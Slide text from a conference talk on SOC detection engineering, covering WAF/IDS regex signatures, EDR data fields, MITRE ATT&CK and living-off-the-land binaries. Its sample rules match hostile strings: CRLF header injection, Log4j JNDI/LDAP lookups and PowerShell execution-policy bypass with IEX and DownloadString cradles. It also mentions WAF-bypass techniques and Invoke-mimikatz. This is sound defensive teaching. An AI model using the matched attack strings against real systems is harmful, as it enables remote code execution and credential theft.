1 of 20

Detection Engineering for SOC

Sunil Kumar BV | Sr Security Engineer | Rakuten

“Everything Published, Talked and/or discussed in this conference is solely based on my personal point of view,

and does not represent my current, or past employers.”

2 of 20

Next 40 Mins !

  • SOC Detection concept
  • Detection Logic in WAF/ IDS�Workflow�HTTP Header – L7 data fields�Regular expressions�Example
  • Detection Logic in EDR�detection Focus based on Kill chain and Data collection details�Different OS Binaries�ATT&CK techniques count per Data Source�Example
  • Q&A

3 of 20

SOC Detections Concept

4 of 20

IDS and WAF Workflow example

Stage 1: Parse HTTP(s) packet from client�(HTTP Request and response logs)

Stage 2 : Chose rule set depending on type of incoming parameters

Packet decode, HTTP Fields

Stage 3: Normalize data �Packet grouping

Stage 4: Apply detection Logics Regular expression based (signatures/Rules/patterns based)

Stage 5: Make detection decision�alert/offence will be triggered based on true/false/score

5 of 20

HTTP Header (under L7 data)

Layer 7 (or the application layer) is the highest layer in the OSI model of network communication. It's responsible for providing network services to application processes running on a host like web browsers, email clients and file-sharing programs.

Most user-facing protocols and applications like HTTP, FTP and SMTP operate on layer 7.

Not limited to these fields, there will be a greater number of fields available in the IDS/WAF�and Number of different ideologies (scoring etc) will be used by different vendors.

HTTP Related Fields

Files related

Email Related

TCP/UDP DOS related

http-req-cookie

file-data

pop3-req-protocol-payload

tcp-context-free

http-req-headers

file-elf-body

pop3-rsp-protocol-payload

udp-context-free

http-req-message-body

file-flv-body

imap-req-cmd-line

 

http-req-host-ipv4-address-found

file-html-body

imap-req-first-param

unknown-req-tcp-payload

http-req-host-ipv6-address-found

file-java-body

imap-req-params-after-first-param

unknown-rsp-tcp-payload

http-req-host-header

file-mov-body

imap-req-protocol-payload

 

http-req-mime-form-data

file-office-content

imap-rsp-protocol-payload

unknown-req-udp-payload

http-req-ms-subdomain

file-pdf-body

email-headers

unknown-rsp-udp-payload

http-req-origin-headers

file-riff-body

 

 

http-req-params

file-swf-body

 

 

http-req-uri

file-tiff-body

 

 

http-req-uri-path

file-unknown-body

 

 

http-req-user-agent-header

ftp-req-params

 

 

http-rsp-headers

ftp-req-protocol-payload

 

 

http-rsp-non-2xx-r

ftp-rsp-protocol-payload

 

 

http-rsp-reason

ftp-rsp-banner

 

 

 http-req-method

ftp-rsp-message

 

 

6 of 20

Regular expression…

…..is a sequence of characters that define a search pattern�

  • IDS and WAF will be using Regex for detection logic (the signatures/Rules/patterns are written)
  • Easily understandable– Human friendly to read.
  • Simply “string defined of different syntax and wildcards” which helps in finding sub-string in source text.

  • Case in-sensitive
  • Search of Open bracket script
  • Anything after the string

Most of the Regex in IDS/WAF are written for Signature set of Injections like SQLi, LDAP, Header, Code, OS command and XSS -Cross site Scripting (Nucli scan) etc.�

Attacker are able to find potential ways to Bypass IDS/WAF , these are Bug or "weak places" in regular expressions:

https://github.com/attackercan/regexp-security-cheatsheet and https://www.slideshare.net/slideshow/lie-tomephd2013/21958607#35

  • ReDos – rule set bypassing
  • HTTP Parameter Pollution
  • Double URL Encoded

Mitigation: Precompile regex patterns where possible to improve performance

Use of DAT (Dynamic analysis Tool) for regex checking and fuzzing with created regex patterns which will help in checking of Input validation, limitation , Regex timeout, Resource limits��Ex: https://redosdetector.com/

7 of 20

How can these be used in our Environment:

- Understanding what to detect?

  • select an adversarial technique to detect –Planning
  • Proof of concept
  • Research the underlying technology – Hypothesis creation

- Understanding how to detect?

  • identify data sources – Data and logs selection
  • Build the detection – implementation
  • Correlation with other log sources.

- Peer review (continuous testing and Validation)

- Submit detection into the pipeline (towards Production)

8 of 20

Example on writing these patterns / signature to detect:

sharing the latest attacks details: https://blog.orange.tw/posts/2024-08-confusion-attacks-en/

Confusion Attacks:

  • Filename Confusion
  • DocumentRoot Confusion
  • Handler Confusion

Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

CVE-2023-38709 - Apache HTTP Server: HTTP response splitting

https://bugzilla.redhat.com/show_bug.cgi?id=2273491

  • Faulty input validation in the core of Apache allows malicious or exploitable backend/content�generators to split HTTP responses,
  • Acknowledgements: finder: Orange Tsai (@orange_8361) from DEVCORE
  • CR + LF → Used as a new line character in Windows (Carriage Return + Line Feed - \r\n).

http-req-cookie contains "\r\nContent-Length:” <case-insensitive>

AND

http-req-URL contains “cURL” <case-insensitive>

9 of 20

Log4J: CVE-2021-44228

It is a RCE vulnerability in Apache Log4j 2.0 through 2.14.1 and

we can achieve this by submitting an exploit string as part of HTTP headers destined for a vulnerable server, then exploit will request a malicious payload from an attacker-controlled server through the Java Naming and Directory Interface (JNDI) over a variety of services, such as Lightweight Directory Access Protocol (LDAP).

POC: https://www.trendmicro.com/ja_jp/devops/22/a/detect-log4j-vulnerabilities.html

Check out for Threat classification:

http://projects.webappsec.org/w/page/13246978/Threat%20Classification

http-req-header == "($?) $JNDI:"

OR

http-req-header == "($?) $JNDI:LDAP”

OR

http-req-header contains "($?) $JNDI:LDAP” AND “\b[a-zA-Z0-9-]+\. [a-zA-Z]{2,}\b”

10 of 20

Detection Logic in EDR

- The IOC are going to change easily.

- We should concentrate on Tactics, Techniques and Procedures (TTPs)

How the adversary goes about accomplishing their mission from reconnaissance all the way through data exfiltration and at every step in between

What exactly to look at:

  • In the example, Technique used is Cred Dump and shown one of the procedure but is it enough or we need to do atomic testing.
  • What happens when advisory uses new procedure, will our alarms work or not.

11 of 20

Detection Focus (based on Kill chain)

Reconnaissance: attackers scan the environment we can max block IP or segment, but they can change it quickly before the attack.�Weaponization: we cannot catch the attackers here, as they build their payload in their environment where we do not have access/ logs.�Delivery/ Exploitation: these are our vendor address like Firewall and Email gateways �Installation and C2: here we can look on detection engineering activity , once the files ( macro, powershell etc ) from any process or object get in we can check for possible alarming in environment.�Action on Objectives: based on Organizational requirement Fine tuning the detection/ rule set to reduce the FP fatigue or our requirement.�Impact: so that we can catch advisory before potential impact

Data collections:

- Type of Data collected?

- Where is it stored?

- Is it ingested to SIEM, EDR or not?

- Prioritizing data sources based on expenses.

- Gap analysis on Data sources and ingested data.

12 of 20

MITRE Framework

  • MITRE attack will be overwhelming – �navigator : https://mitre-attack.github.io/attack-navigator/
  • We need to scope the attack vectors as below:�Basically Filtering based on requirement: �- Filter Platform in layer controls (Linux, win, mac, etc.)

- Then starts look for particular things under selection controls�threat group, data sources

- Select unannotated ( technique/task not applicable) and

- Then toggle the state and hide (eyeball) the rest.��

13 of 20

adversaries leverage Scripts

OS Binaries are local to their OS, but these binaries have been utilized and exploited by cyber criminals and crime groups to camouflage their malicious activity.

we can have look on categories for various OS Binaries:

  1. Windows OS Built in Binaries - Living Off The Land Binaries (LOLBAS Binaries and Scripts) – https://lolbas-project.github.io/api/lolbas.csv
  2. This file contains every LOLBAS entry in a single file, broken down by LOLBAS file and command
  3. LOLBAS are often Microsoft signed binaries
  4. They can be used for a range of attacks, including executing code, to performing file operations (downloading, uploading, copying, etc).

2. Mac OS Built in Binaries - Living Off the Orchard https://www.loobins.io/binaries/ LOOBins is a Python SDK and command-line utility for programmatically interact - https://www.loobins.io/docs/api/pyloobins/

  1. Unix OS Built in Binaries - GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems https://gtfobins.github.io/ https://github.com/GTFOBins

14 of 20

�ATT&CK techniques count per Data Source

We can see Command Execution and Process Creation are top used procedures in TTPs.�

MITRE DeTTECT - The Miter detect framework

Based on this, we can priorities our data collection to address ATT&CK techniques and sub-techniques and collect Sysmon, linux, servers and other logs accordingly...

15 of 20

EDR Fields

These are some of the most used data fields associated with events. Fields that begin with lowercase letters are present in all events.�We have Greater number of Fields from Agents which will collect the data.

timestamp

FilePath

_time

GrandParentImageFilePath

HostID

ParentImageFilePath

event_platform

FileWrittenFlags

event_Name

 

ComputerName

DetectId

 

DetectName

OriginalFilename

DetectDescription

FileName

 

ImageFileName

CommandLine

GrandParentFileName

ParentCommandLine

BaseFileName

GrandparentCommandLine

TargetFileName

 

ContextBaseFileName

RegType

 

RegistryPath

SHA256HashData

RegNumericValue

DomainName

RegStringValue

HostURL

RegBinaryValue

16 of 20

Ex :- Detecting malicious PowerShell command execution

It is a built-in command line tools and It can download and execute code from another system and provides unprecedented access on Windows computers

Its malicious use is often not stopped or detected by traditional endpoint defenses, as files and commands are not written to disk. This means fewer artifacts to recover for forensic analysis.

Several offensive tools exist that are built on or use PowerShell, including the following: Invoke-mimikatz

POC: https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters

- There can be number of other tuning need to performed based on from which process the command is executed (parent process) and is the parent is legitimate or unknown in string etc.

Condition 1:

((CommandLine contains “powershell.exe –exec” AND CommandLine contains “bypass)

AND

(CommandLine contains “IEX (” OR CommandLine contains “Invoke-Expression”)

AND�CommandLine contains “.DownloadString”

AND

CommandLine contains “\b[a-zA-Z0-9-]+\. [a-zA-Z]{2,}\b”

AND

reffererURL contains \b[a-zA-Z0-9-]+\. [a-zA-Z]{2,}\b”)

17 of 20

Processing Directions:

Step 1 : collecting commands/scripts and its variable details:

Step 2:

Same way we can try for other commands, process like:

  • nltest ***
  • net config ***
  • Run cmd ***

18 of 20

Fine tuning Practices

- Continuous Improvement and development� use version control to keep and monitor changes.��- Non-Efficient alerts need to be fixed Update the logic� Added new functionality such as enrichment or correlation

  • Reviewing alert PeriodicallyNumber of the alert/Offences�Number of FP, Benign TP, TP�Event to alerts time differences�Syslog or EDR agent Fields�Fine tuning Practices

19 of 20

References:

20 of 20

Anybody got any

Questions?